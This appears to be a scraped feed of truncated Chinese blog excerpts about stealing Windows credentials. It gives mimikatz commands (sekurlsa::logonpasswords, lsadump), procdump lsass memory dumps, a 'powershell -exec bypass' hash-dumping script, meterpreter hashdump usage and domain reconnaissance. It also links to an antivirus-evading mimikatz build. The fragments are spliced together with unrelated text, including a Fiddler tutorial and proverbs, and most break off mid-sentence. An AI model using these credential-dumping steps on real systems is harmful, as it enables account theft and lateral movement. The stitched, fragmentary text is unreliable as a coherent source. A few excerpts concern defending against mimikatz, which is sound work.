前言 介绍一下windows的密码hash值的组成: Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值,例如: Administrator::C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::用户名称为:AdministratorRID为:500LM-HASH值为:C8825DB10F2590EAAAD3B435B51404EENTLM-HASH值为:6830209

mimikatz神器大家都知道吧,可以抓取系统内的明文密码,但是平时我们测试的时候需要把mimikatz的几个文件上传到目标系统上面,然后再手工执行几个命令才能搞定,今天无意访问一个大神的博客,发现其实可以利用powershell一句话搞定,是国外大神的方法. 国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当轻便. 以管理员权限启动CMD执行下以命令即可: view source 1 powershell "

在线抓密码 1.mimikatz privilege::debug token::whoami token::elevate lsadump::sam mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" 2.ps脚本 使用Get-PassHashes.ps1 powershell -exec bypass Import-Module .\Get-PassHashes.PS1 Get-PassHashe

法一: https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170813 第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //抓取密码 注:请以管理员权限!!! (什么?要管理员权限!有管理员权限了还要你干嘛....) 法二: meterreter下已集成了mimikata meterpreter > load mimikatz meterpreter > wd

青.取之于蓝,而青于蓝:冰.水为之,而寒于水 不积跬步,无以至千里;不积小流,无以成江海. 1解压Fiddler Web Debugger V4.6.2017修正中文第6版至C盘Program Files (x86) 打开Fiddler-中文版 使用断点修改数据 点击规则-自动断电-在请求之前(快捷键F11) 出现下方红色断点图标表示断点功能打开 打开一个新建模版输入数据并打开上图左下角捕获按钮, 输入完成后点击保存,回到Fiddler-中文版 选择Host为127.0.0.1的bugfree3

今晚回学校无聊搞搞自己school  实战的时候遇到mimikatz抓密码报错  以前没遇过 记一下(水一篇) 爆ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 开始以为又是上次2008注册表组策略的问题 结果runas就解决 最近看过一些人还是有些感触,有些人早忘了自己还是个弟弟呢. 戒骄戒躁.

前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里. 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求. 今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来. 相关知识点总结如下: 免杀 payload 的生成,请使用 Veil msf 在 meterpreter 下的提权尝试 msf 在 meterpreter 下的 bypassuac 尝试 内网渗透测试过程中的信息关联 met

本文作者:i春秋签约作家——shuteer 前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里.于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求.今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来.相关知识点总结如下: 免杀payload的生成,请使用Veil msf在meterpreter下的提权尝试 msf在meterpreter下的bypassuac尝试 内网渗透测试过程中的

Mimikatz是一款能够从Windows中获取内存,并且获取明文密码和NTLM哈希值的神器,本文将介绍如何防御这款软件获取密码. Mimikatz介绍 Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的工具,攻击者可以借此漫游内网.他们可以通过明文密码或者传递hash值来提权.可能很多人会问“难道微软就没想过怎么防御吗?” 在Google上搜索“mimikatz的防御”,你会发现搜索结果很有限.我找到的最好的一篇文章就是这篇.里面提

Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载.但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行! 那么如何dump LSASS进程内存呢.可以通过以下方式: 1.对于NT6可以使用windows自带的功能进行dump: 任务管理器—进程—显示所有用户进程—找到lsas

前几天看到了老外一篇讲 mimikatz 防御的文章,感觉行文思路还不错,但是内容稍有不足,国内也有一篇翻译,但是只是照着错误翻译的,所以就萌生了把那篇优秀文章,翻译复现,并加入其它一些内容,本文只是抛砖引玉,文中有错误的话,欢迎吐槽. mimikatz 在内网渗透中是个很有用的工具.它可能让攻击者从内存中抓到明文密码.大家都知道这个工具很厉害,微软肯定也知道了,所以就搞了一些安全防护机制让 mimikatz 抓不到密码.但是在 win2008 之前的系统上还是能抓到密码的.一般情况下,只要有本

mimikatz privilege::debug #提权命令 sekurlsa::logonPasswords #抓取密码 winmine::infos #扫雷作弊 lsadump::lsa /patch #获取当前此计算机存在过用户的NTLMHASH procdump64.exe -accepteula -ma lsass.exe lsass.dmp #导出为lsass.dump文件 sekurlsa::minidump lsass.dmp #配合procdumo将李飒飒啊.进程内存文件导出

我上篇随笔说到了内网中横向移动的几种姿势,横向移动的前提是获取了具有某些权限的用户的明文密码或hash,正愁不知道写点啥,那就来整理一下这个"前提"-----如何在windows系统中抓hash 0x01 前言 事先声明,本文还是暂时不考虑免杀的问题,有些杀软十分变态,针对lsass等关键部位的防护非常好,一有风吹草动立刻报警,绕过方法还有待测试......不过这并不耽误我整理一下小知识点(怒) 本文中提到的"杀软"只是特指  XX安全软件  这一款安全产品,仅反映

Mimikatz是一款由法国人编写的轻量级调试工具,但更为人所知的是使用Mimikatz来获取Windows的明文密码. 这个软件的作者博客:http://blog.gentilkiwi.com/mimikatz 作者把软件托管到Github上的,需要FQ才能下载.我已经下载好.这个软件杀毒软件会报毒,不过我已经修改了一个不报毒的版本. 原版,修改版,1.0和目前最新2.0版本,使用方法的下载地址: 链接:http://pan.baidu.com/s/1bomCPMR 密码:8sjl 作者博客截

一.获取密码# privilege::debug sekurlsa::logonpasswords mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswords full" >>1.txt exit 一般我会使用bat @echo offmimikatz.exe privilege::debug sekurlsa::logonpasswords exit>C:\programdata\1.txt

0x00前言: 这几天看了看信息安全就业的面试题,其中有一条是计划任务如何设置,好几个月前稍微接触了,但是很久没用差不多都忘了>_<,这里就稍微学习下windows的计划任务 写着写着就偏离了正题,稍微有点像自己的练习记录了,其中除了计划任务也穿插了一些msf的知识 0x01场景设置: 因为直接在windows是敲几个命令太无聊了,于是这里我用msf模块的永恒之蓝漏洞进行远程操作 kali攻击机ip:10.10.10.128 win7目标机ip:10.10.10.129 首先加载模块 然后选下

测试环境 域控: 192.168.211.130 已经控制的机器: 192.168.211.133 获取网络信息 查看机器的网络信息 ipconfig /all # 查看 网卡信息,获取dns 服务器ip (域控) arp -a  # 搜集内网信息   net view   #查看网络中的机器 net view /domain # 查看网络中的域 net view /domain:domainhack # 查看 domainhack 域中的机器 通过 ping 机器名 可以获取 ip 查找 域控

本文作者:i 春秋签约作家——shuteer 前期准备:1. 使用Veil生成免杀PAYLOAD: 2. 有一个外网IP的服务器,安装好metasploit,方便操作. 一．SHELL反弹meterpreter 上传免杀的PAYLOAD到SHELL(有时候会碰到EXE文件上传不了,可以使用powershell的meterpreter模块“XX.bat格式”来实现),然后在菜刀或者WEBSHELL下面运行,反弹成功. 二．提权 反弹成功后第一步就是getuid看权限,然后尝试提权,有以下几种方法

Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段.本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit. 漏洞环境: 靶机:windows 7 (192.168.0.135) 攻击机:kali 2018 (192.168.0.133) 开始之前先来熟悉 Metaspolit 基本术语: Auxiliaries(辅助模块),Exploit(漏洞利用模块),Payload(攻击载荷模块),Post(后期渗透模块),Encoder

使用hashdump抓取密码(需要系统管理权限) 另外一个更强大的模块 smart_hashdump 如果目标是win7 就需要先绕过UAC 还可以使用msf内置的mimikatz抓取hash msv kerberos 抓取系统票据 wdigest 获取系统账户信息 mimikatz_command -f samdump::hashed 抓取hash mimikatz_command -f handle::list 查看进程 mimikatz_command -f service::list w